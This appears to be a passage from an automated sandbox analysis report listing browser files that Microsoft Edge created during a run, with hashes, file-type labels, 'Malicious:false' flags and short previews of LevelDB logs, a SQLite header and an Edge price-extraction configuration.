                                                                                                                                                                                                                                                                                                                        SHA-512:BB3BEF8311E4D30D9CFD8CE942D59B0F8B9AA4C86CE299D2DF738F9FA883AAD473A880651A8F5B97ACF39F9613D6FC8165BB731E2439A32F3F01D448B9EF672D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.887 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:40:23.887 1cbc Recovering log #3.2024/12/10-12:40:23.888 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:40:39.296 1c84 Level-0 table #5: started.2024/12/10-12:40:39.328 1c84 Level-0 table #5: 634833 bytes OK.2024/12/10-12:40:39.329 1c84 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):516
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.2208784638097585
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:7K/D+vVaYebn9GFUt8OK/T/+OKGV5OaYebn95Z9pKuf0TDfHKOnlh:7KIVaYeb9ig8OKfKAOaYeb9zLyTjlh
                                                                                                                                                                                                                                                                                                                        MD5:980E6D856F48DEEE34CD1CDAB9608ADC
                                                                                                                                                                                                                                                                                                                        SHA1:F347A537F2E3034C096FBE2170F2D10BA45F8053
                                                                                                                                                                                                                                                                                                                        SHA-256:7AE591C0AC1EFE066325C150B49F7A80E08700CCD41C63370500866058AA969E
                                                                                                                                                                                                                                                                                                                        SHA-512:BB3BEF8311E4D30D9CFD8CE942D59B0F8B9AA4C86CE299D2DF738F9FA883AAD473A880651A8F5B97ACF39F9613D6FC8165BB731E2439A32F3F01D448B9EF672D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.887 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:40:23.887 1cbc Recovering log #3.2024/12/10-12:40:23.888 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:40:39.296 1c84 Level-0 table #5: started.2024/12/10-12:40:39.328 1c84 Level-0 table #5: 634833 bytes OK.2024/12/10-12:40:39.329 1c84 Delete type=0 #3.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):103
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.248480538985685
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjGIOhinx6+qTxFxN3erkEtl:scoBY7jZNxDqTxFDkHl
                                                                                                                                                                                                                                                                                                                        MD5:42E7C651FA9CFE891D084F7A327ED9AF
                                                                                                                                                                                                                                                                                                                        SHA1:BF44DA5B3F89998DC693EE624C75DB1A56BFFF49
                                                                                                                                                                                                                                                                                                                        SHA-256:D3AF6DD512ADB5AAAB05A3B4A54908614D20103A03A61AF90F8409176FFDFF93
                                                                                                                                                                                                                                                                                                                        SHA-512:52CE8419D90C9836B270F53BC3B636D7EF158FCD3681B19517103D9240D2ADDC1F84293563F2FF5E7AB39A68A8FE0E4DD9860FDD04C120E89A7753CD385CE90C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......@.p:7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):20480
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.6132182045541024
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jHuI0p8mL:TO8D4jJ/6Up+A
                                                                                                                                                                                                                                                                                                                        MD5:12172539024D1249042133995703822F
                                                                                                                                                                                                                                                                                                                        SHA1:5D7DD9E9CCD3C0192D2EDF1219E899BC942ED5FA
                                                                                                                                                                                                                                                                                                                        SHA-256:613D0CCDBED381754872B8702C9A6588E43C3A463FD70E0FFD64D40F0A66F156
                                                                                                                                                                                                                                                                                                                        SHA-512:6177094BC0A3CE029A306F411A761A2E088E6F3BCF479F4475886DB25F2301A0A05EE0C6D2C2C037559A3D6A01DD7FD5BD3F553FDD2E83E5E6C22CD8469DE5BD
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):375520
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.354122628571287
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:FA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:FFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                        MD5:19B51AD8F565C5C6EB2C4146700E4B00
                                                                                                                                                                                                                                                                                                                        SHA1:BB9215216EF5CE1666E095647D98E0947F1DE9CB
                                                                                                                                                                                                                                                                                                                        SHA-256:3D6F1F559EC3F30AF9C5B6FFF073ABCD803576FF4CF71356DA7B86E008987C85
                                                                                                                                                                                                                                                                                                                        SHA-512:4C58F41FD5AF0D8035F734310AD29B8E7E20764E38FA68D5DD9FB38E3BEEC209E585C97EBBAF2D95510FAE39890D459219BC0A69014D0DA6B31E35924ACDCCE6
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:...m.................DB_VERSION.1.R..q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378326032663170..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):16
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                        MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                        SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                        SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                        SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):315
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.06849321128861
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7L+11N723oH+Tcwtk2WwnvB2KLlpL+X1q2PN723oH+Tcwtk2WwnvIFUv:7maYebkxwnvFLTUvVaYebkxwnQFUv
                                                                                                                                                                                                                                                                                                                        MD5:2E79D890D3B5BB002B69E38B0B66FEC0
                                                                                                                                                                                                                                                                                                                        SHA1:4F9B4CF7D757948F25571538447359CE858AFEFA
                                                                                                                                                                                                                                                                                                                        SHA-256:E03B9FABC3F4F41A99A8698A70A7B01CA941AA1293E76F7274F0AD8ED8C83373
                                                                                                                                                                                                                                                                                                                        SHA-512:777874E4DE6807C3521963B419D29A6A49103D8816204FAA70D644B716102A18A0034312ABC0D98C5653AE7DD9B5DBFF32B05892EA0DB5B383CCE53F7D373DEB
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:30.018 20c0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2024/12/10-12:40:30.118 20c0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):41
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                        MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                        SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                        SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                        SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                                                                        Size (bytes):358860
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.324608622066088
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RB:C1gAg1zfvZ
                                                                                                                                                                                                                                                                                                                        MD5:5F3CA67145EF69FF4EF132C5BEFE475F
                                                                                                                                                                                                                                                                                                                        SHA1:D8DEF554DEDCA52D7B9DD64EAE0572B0D8CBCD1A
                                                                                                                                                                                                                                                                                                                        SHA-256:CC45091E7D544F22F302D09C5F105704D0E6A613DC2FC0EA347F91FDF9A0A19F
                                                                                                                                                                                                                                                                                                                        SHA-512:D17AD0D583255527372AD7A77CA4EC481DBC259BE88803DDFCAA0B2D615159EFF1C8848D83A49ECB2D7A4F4F5C7E212ECC21BB1505EED3D53E8631D92362167C
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.137082356569092
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLl1+q2PN723oH+Tcwt8aPrqIFUt8OLeLl4Zmw+OLeLl53VkwON723oH+Tcwtc:7K7+vVaYebL3FUt8OKu/+OKHV5OaYebc
                                                                                                                                                                                                                                                                                                                        MD5:E9028B080BBE2041EC7E8EA77E18FAD0
                                                                                                                                                                                                                                                                                                                        SHA1:90C460B909834B8CE6A342811B579BC3B575E9D5
                                                                                                                                                                                                                                                                                                                        SHA-256:17FD601C08956F26E583FFCF85C988B53E5E6CAC9CD48BD703FC4811A421F555
                                                                                                                                                                                                                                                                                                                        SHA-512:549B633D7F47671ED218CBA3965FAF6FD7885131D74CD17410135B21EF984B8171A968D55535981938267CBD69CD139775CF5B6FB9A82DD8942F6750CD6792CB
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.915 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:40:23.916 1cbc Recovering log #3.2024/12/10-12:40:23.919 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):328
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.137082356569092
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLl1+q2PN723oH+Tcwt8aPrqIFUt8OLeLl4Zmw+OLeLl53VkwON723oH+Tcwtc:7K7+vVaYebL3FUt8OKu/+OKHV5OaYebc
                                                                                                                                                                                                                                                                                                                        MD5:E9028B080BBE2041EC7E8EA77E18FAD0
                                                                                                                                                                                                                                                                                                                        SHA1:90C460B909834B8CE6A342811B579BC3B575E9D5
                                                                                                                                                                                                                                                                                                                        SHA-256:17FD601C08956F26E583FFCF85C988B53E5E6CAC9CD48BD703FC4811A421F555
                                                                                                                                                                                                                                                                                                                        SHA-512:549B633D7F47671ED218CBA3965FAF6FD7885131D74CD17410135B21EF984B8171A968D55535981938267CBD69CD139775CF5B6FB9A82DD8942F6750CD6792CB
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.915 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/12/10-12:40:23.916 1cbc Recovering log #3.2024/12/10-12:40:23.919 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                                                                                                                                                                        MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                                                                                                                                                                        SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                                                                                                                                                                        SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                                                                                                                                                                        SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.134990711151057
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLTE+q2PN723oH+Tcwt865IFUt8OLeLZkZmw+OLeLhiVkwON723oH+Tcwt86+e:7KU+vVaYeb/WFUt8OKdk/+OKkV5OaYev
                                                                                                                                                                                                                                                                                                                        MD5:A659427B68B19EBAB0B750C1B18D4FDE
                                                                                                                                                                                                                                                                                                                        SHA1:222EB342188EEFB6A7B84FE2C0590F6F5AFD184A
                                                                                                                                                                                                                                                                                                                        SHA-256:818272392EF49F65D91B0854DF81833CF190F1CB9F73A4A9E1DE8CC864963026
                                                                                                                                                                                                                                                                                                                        SHA-512:E30E772D3313343C419A8FC7AC22B24BEF093632C7B83B977C03F7EAF08934515DCA3F8CC6892DF496595B77941D3F4EF9B7151D0950006DE015100959CA368D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.943 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:40:23.949 1cbc Recovering log #3.2024/12/10-12:40:23.950 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:ASCII text
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):332
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.134990711151057
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:6:7LeLTE+q2PN723oH+Tcwt865IFUt8OLeLZkZmw+OLeLhiVkwON723oH+Tcwt86+e:7KU+vVaYeb/WFUt8OKdk/+OKkV5OaYev
                                                                                                                                                                                                                                                                                                                        MD5:A659427B68B19EBAB0B750C1B18D4FDE
                                                                                                                                                                                                                                                                                                                        SHA1:222EB342188EEFB6A7B84FE2C0590F6F5AFD184A
                                                                                                                                                                                                                                                                                                                        SHA-256:818272392EF49F65D91B0854DF81833CF190F1CB9F73A4A9E1DE8CC864963026
                                                                                                                                                                                                                                                                                                                        SHA-512:E30E772D3313343C419A8FC7AC22B24BEF093632C7B83B977C03F7EAF08934515DCA3F8CC6892DF496595B77941D3F4EF9B7151D0950006DE015100959CA368D
                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                        Preview:2024/12/10-12:40:23.943 1cbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/12/10-12:40:23.949 1cbc Recovering log #3.2024/12/10-12:40:23.950 1cbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                                                                                                                                                                        Download File
                                                                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                        Size (bytes):1254
                                                                                                                                                                                                                                                                                                                        Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                        SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                                                                                                                                                                        MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                                                                                                                                                                        SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                                                                                                                                                                        SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
